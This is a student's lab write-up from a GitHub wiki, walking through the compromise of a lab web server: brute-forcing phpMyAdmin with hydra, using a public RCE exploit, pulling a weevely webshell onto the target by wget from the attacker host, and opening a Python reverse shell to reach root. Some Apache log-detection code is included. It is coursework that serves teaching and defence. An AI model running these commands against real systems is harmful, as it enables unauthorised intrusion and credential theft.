Lab 10.2: Exploiting Nancurunir - squatchulator/Tech-Journal GitHub Wiki

Lab 10.2 - Exploiting Nancurunir

What gave me a lot of trouble during this lab was figuring out what to do once I got into the phpMyAdmin page. There was a lot going on, and the interface was slow and confusing, so I spent a long time sifting through things that I figured could be useful. Eventually, when clicking on the 'users' table in the database, I found something that looked like a hash, but it took me way too long to figure this out. I felt like this one was a lot harder than the other exploit lab we did recently, as there were a lot more steps, but all the steps were things we had learned how to do in previous labs, so it wasn't terrible.

Recon

  • We don't know much about this target other than its FQDN, which is nancurunir.shire.org. That means we are going to have to leverage tools we have used in the past to perform reconnaissance on this system and find the following:

Target IP

  • Performing an nslookup returned the addresses 76.223.54.146 and 13.248.169.48. According to Google, this can mean that one of the zones was not properly removed and both addresses point to this. (NOTE: This is Champlain's public IP.)
  • After nslookup, I tried a default nmap scan on the FQDN. This returned much more info, and let me know that the 76 address is the active one.
  • This didn't seem right, so I ran an nslookup on the FQDN using our internal DNS server. This returned the address 10.0.5.28.

Open ports

  • After running an NMAP version/OS scan, we can see that port 80 is open and running Apache httpd 2.4.52 on Ubuntu Linux.

Discovered vulnerabilities

  • After getting into phpMyAdmin and into the admin portal, the Ubuntu version appears to be 8.0.30-0ubuntu0.22.04.1.
  • Since we know this is a web server now, I ran a curl on the IP address and took note of some potentially important words that could be leveraged in a password crack later on. (staff, gandalf, shallnotpass, glamdring, narya) It looks like this version of Apache is very vulnerable to memory overflow attacks and other memory-related exploits.
  • Then, I used cewl to pipe all words on the page into a text document with cewl http://10.0.5.28 -d 1 > gandalf.small.txt. Some stuff in there was probably not relevant for passwords, so since it was so short already, I went in and deleted useless words manually.
  • I then mangled the password list with rsmangler --file gandalf.small.txt -x 12 -m 9 -l -s -e -i -p -u -a --output gandalf.mangled.txt
  • To find more info, I ran dirb http://10.0.5.28 -r and found that an admin portal exists at http://10.0.5.28/phpmyadmin. I think this is the way we break in.
    • This part worked! I ran hydra -l gandalf -P gandalf.mangled.txt -s 80 -f 10.0.5.28 http-get /phpmyadmin/ and I got the username and password, which are gandalf and 1990Gandalf. I ran it again, and I got another password which is Gandalfadmin. This didn't work, and with some help from Prof. Furkan, I inspected the webpage in the F12 screen and tried shallnotpass which worked!
  • The PHP version looks like it's 4.8.1. It seems like there are exploits for this: https://www.exploit-db.com/exploits/50457 (I just copied it and put it into a .py file). The syntax for this looks like .py [ipaddr] [port] [path] [username] [password] [command] to do RCE.
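From the defender's side, the hydra run and the dirb sweep above both leave a distinctive trail in Apache's access log: a burst of 401s from one client against /phpmyadmin/ that ends in a 200, and a burst of 404s from the same client. This added Python example (not from the lab or this wiki) parses constructed combined-format log lines and flags both patterns; the IP addresses, timestamps and path names in the sample are made up.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache combined-log format, as written by the Apache 2.4.52 instance on port 80.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
def _line(ip, sec, path, status, minute=0):
    return f'{ip} - - [06/Apr/2023:10:{minute:02d}:{sec:02d} +0000] "GET {path} HTTP/1.1" {status} 512'
# Constructed sample: a hydra-style http-get run on /phpmyadmin/ (25 x 401, then a 200 from
# the same client), a dirb-style sweep of 15 non-existent paths, and one ordinary visitor.
SAMPLE_LOG = "\n".join(
    [_line("10.0.17.81", s, "/phpmyadmin/", 401) for s in range(25)]
    + [_line("10.0.17.81", 25, "/phpmyadmin/", 200)]
    + [_line("10.0.17.81", s, f"/guess{s}", 404, minute=1) for s in range(15)]
    + [_line("10.0.5.100", 30, "/index.html", 200, minute=1)]
)

def parse(log_text):
    """Yield (ip, timestamp, path, status) for every line matching the combined format."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], TS_FMT), m["path"], int(m["status"])

def bursts(log_text, status, threshold, window_s=60):
    """{ip: peak count} for clients with >= threshold responses of `status` in any window_s-second window."""
    stamps = defaultdict(list)
    for ip, ts, _path, st in parse(log_text):
        if st == status:
            stamps[ip].append(ts)
    hits = {}
    for ip, times in stamps.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # sliding window over sorted timestamps
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = max(hits.get(ip, 0), end - start + 1)
    return hits

def brute_force_successes(log_text, prefix="/phpmyadmin", min_failures=10):
    """IPs that got a 200 under `prefix` after >= min_failures 401s there: a guess that finally worked."""
    failures, flagged = defaultdict(int), set()
    for ip, _ts, path, st in parse(log_text):
        if path.startswith(prefix) and st == 401:
            failures[ip] += 1
        elif path.startswith(prefix) and st == 200 and failures[ip] >= min_failures:
            flagged.add(ip)
    return sorted(flagged)
```

Run bursts(SAMPLE_LOG, 401, 10) and bursts(SAMPLE_LOG, 404, 10) against a real /var/log/apache2/access.log to see the same two signals; brute_force_successes is the one that deserves an immediate password reset.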

How I achieved a foothold

  • It looks like an error has appeared on the server. It says "The configuration file now needs a secret passphrase (blowfish_secret)." Maybe this can be exploited?
  • I went into the 'user' table and navigated to the 'edit' tab on the 'root' user, and copied the 'authentication_string' contents, as this appears to be a hash - I pasted it into CrackStation, and it looks like this worked! I got the result of gandalfthewhite. Not sure if this is a username or password.
  • I ran the command python3 rce_myadmin.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass whoami and this seemed to run ok!
  • Then, I generated a webshell with sudo weevely generate <password> ./miles_shell.php and uploaded it to Nancurunir by serving it with python3 -m http.server 8080 and doing a wget from Nancurunir now that I can use RCE: python3 rce_myadmin.py 10.0.5.28 80 /phpmyadmin gandalf shallnotpass "wget http://10.0.17.81:8080/miles_shell.php"
    • Now that we have a webshell uploaded to the target, we can access it with sudo weevely http://10.0.5.28/phpmyadmin/miles_shell.php <password> and we're in!

How I compromised root

  • I used path traversal to navigate to the top directory and then to the etc directory to see if I could find the shadow file and the passwd file. After getting the passwd file but not the shadow file, I remembered that we have other creds - I tried to elevate to gandalf, and this didn't work either. I did some more research and learned we need to upload a reverse shell via weevely. This can be done with the following:
Start a netcat listener on 4449
nc -nlvp 4449
Then, run the following on the target:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<target IP>",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
  • Now we can run su gandalf to elevate to the gandalf user!

User flag

image

Root flag

  • Now I just have to get into root, which happened to have the same password as gandalf. I just ran a sudo -i (had to include -S tag because it told me to)

image

How might these vulnerabilities be mitigated?

  • The phpMyAdmin portal is not necessarily a vulnerability in itself, but in this case there was no input validation or sanitization on the MySQL part of the server. This means that anyone who is in the admin portal can freely access the hashes for passwords to user accounts, and in this case, I was able to get the hash for the root password of the target.